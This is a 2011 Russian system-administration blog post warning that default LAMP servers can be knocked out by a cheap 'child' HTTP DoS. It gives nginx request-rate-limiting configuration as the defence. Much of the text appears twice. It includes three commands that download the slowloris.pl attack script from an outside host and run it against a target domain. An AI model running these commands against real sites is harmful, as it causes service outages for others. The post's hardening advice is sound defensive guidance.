Системное администрирование →
Детский HTTP DOS
Часто администраторы настраивают LAMP «из коробки». Для домашних страничек и тестовых стендов в этом нет ничего страшного.
Полноценный DDOS — это не самое дешевое удовольствие для атакующего и, если Ваш портал заказали, то должны найтись ресурсы для защиты от атаки.
Куда большую опасность представляет детский DOS, так как провести такую атаку может любой желающий. Уязвимости подвержены все популярные Web серверы в исходной комплектации с пустыми правилами firewall и применяется к корпоративным порталам, выделенным серверам, VPS — всему, что поставлено, но не настроено. Массовый хостинг, как правило, детскими болезнями не болеет.
Для Debian-подобных систем это 3 команды:
Если Вы этого еще не сделали, поставьте на фронтенд nginx. Он не только быстрее работает с файлами и ускорит отдачу статики, но обладает огромными возможностями для администратора, о которых иногда Сысоев рассказывает в рассылке.
Реализация ограничения на количество запросов к динамическим страницам с одного IP.
Разрешено 10 запросов в секунду с одного IP с возможными пиками до 30 запросов.
Юные дарования могут проверить Ваш ресурс на прочность в самый неподходящий момент. Например, когда Вы в отпуске. Не откладывайте защиту в долгий ящик.
Полноценный DDOS — это не самое дешевое удовольствие для атакующего и, если Ваш портал заказали, то должны найтись ресурсы для защиты от атаки.
Куда большую опасность представляет детский DOS, так как провести такую атаку может любой желающий. Уязвимости подвержены все популярные Web серверы в исходной комплектации с пустыми правилами firewall и применяется к корпоративным порталам, выделенным серверам, VPS — всему, что поставлено, но не настроено. Массовый хостинг, как правило, детскими болезнями не болеет.
Для Debian-подобных систем это 3 команды:
wget ha.ckers.org/slowloris/slowloris.pl
aptitude install libio-socket-ssl-perl
./slowloris.pl -dns domain.ru
Если Вы этого еще не сделали, поставьте на фронтенд nginx. Он не только быстрее работает с файлами и ускорит отдачу статики, но обладает огромными возможностями для администратора, о которых иногда Сысоев рассказывает в рассылке.
Реализация ограничения на количество запросов к динамическим страницам с одного IP.
Разрешено 10 запросов в секунду с одного IP с возможными пиками до 30 запросов.
limit_req_zone $binary_remote_addr zone=lphp:10m rate=10r/s;
location / {
limit_req zone=lphp burst=30 nodelay;
Юные дарования могут проверить Ваш ресурс на прочность в самый неподходящий момент. Например, когда Вы в отпуске. Не откладывайте защиту в долгий ящик.
31.07.2011 13:06+0400